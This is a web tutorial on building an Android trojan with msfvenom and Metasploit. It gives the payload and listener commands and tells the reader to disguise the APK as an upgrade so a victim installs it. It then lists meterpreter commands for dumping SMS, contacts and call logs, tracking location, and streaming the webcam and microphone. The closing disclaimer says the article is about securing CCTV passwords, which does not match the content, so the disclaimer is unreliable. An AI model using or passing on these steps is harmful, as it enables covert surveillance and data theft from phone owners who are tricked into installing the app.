Exploit Android Using Kali Linux

This is a tutorial explaining how to hack android phones with Kali Linux

YouTube Video Tutorial : Hack android phone and control webcam

Step 1: Fire-Up Kali:
Open a terminal, and make a Trojan .apk You can do this by typing :

msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.0.112
LPORT=6227 R > andi.apk

LHOST=192.168.0.112 ( Change the IP with your own IP address ) To find your own IP type  in terminal

ifconfig

LPORT=6227 ( you can chose any port you want but make sure it's not used )
You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding

Step 2: Open Another Terminal:
Open another terminal while the apk file is being produced.
start metasploit console, by typing :

msfconsole

Step 3: Set-Up a Listener:

After it loads(it will take some time), load the multi-handler exploit by typing :

use exploit/multi/handler

Set up a (reverse) payload by typing :

set payload android/meterpreter/reverse_tcp

To set L host & L Port type :

set LHOST 192.168.0.4

set LPORT 6227

(Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!
to start the listener type:

exploit

Copy the application that you made (adri.apk) from the root folder to you android phone.
or send it to the victim using Uploading services like Dropbox or any sharing website you may like.
Let the Victim install the andri app(as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when the victim install your app >>>

Step 5: have fun !
Type help to get a list of the available commend :

help

and lets say we typed webcam_stream
There comes the Meterpreter prompt:

here is a list of all the commands

[tab]
[content title="File system"]
Command       Description
    -------       -----------
    cat                 Read the contents of a file to the screen
    cd                  Change directory
    checksum      Retrieve the checksum of a file
    dir                  List files (alias for ls)
    download      Download a file or directory
    edit               Edit a file
    getlwd          Print local working directory
    getwd           Print working directory
    lcd              Change local working directory
    lpwd            Print local working directory
    ls                 List files
    mkdir          Make directory
    mv              Move source to destination
    pwd            Print working directory
    rm              Delete the specified file
    rmdir          Remove directory
    search        Search for files
    upload        Upload a file or directory
[/content]
[content title="Networking"]
    Command       Description
    -------       -----------
    ifconfig       Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route           View and modify the routing table
[/content]
[content title="System"]
 Command       Description
    -------       -----------
    execute        Execute a command
    getuid          Get the user that the server is running as
    localtime     Displays the target system's local date and time
    ps                List running processes
    shell            Drop into a system command shell
    sysinfo        Gets information about the remote system, such as OS
[/content]
[content title="Webcam"]
Command        Description
    -------        -----------
    record_mic          Record audio from the default microphone for X seconds
    webcam_chat       Start a video chat
    webcam_list        List webcams
    webcam_snap     Take a snapshot from the specified webcam
    webcam_stream   Play a video stream from the specified webcam

[/content]
[content title="Android"]
   Command           Description
    -------           -----------
    activity_start         Start an Android activity from a Uri string
    check_root            Check if device is rooted
    dump_calllog        Get call log
    dump_contacts      Get contacts list
    dump_sms             Get sms messages
    geolocate                Get current lat-long using geolocation
    hide_app_icon        Hide the app icon from the launcher
    interval_collect      Manage interval collection capabilities
    send_sms               Sends SMS from target session
    set_audio_mode     Set Ringer Mode
    sqlite_query           Query a SQLite database from storage
    wlan_geolocate    Get current lat-long using WLAN information
[/content]
[/tab]
[warning title="Warning message" icon="exclamation-triangle"]
This article is only for education purpose . Aim of these article is that how can secure cctv cameras using strong passwords. Do not use for criminal or another black art purpose. I am not responsible for that.
[/warning]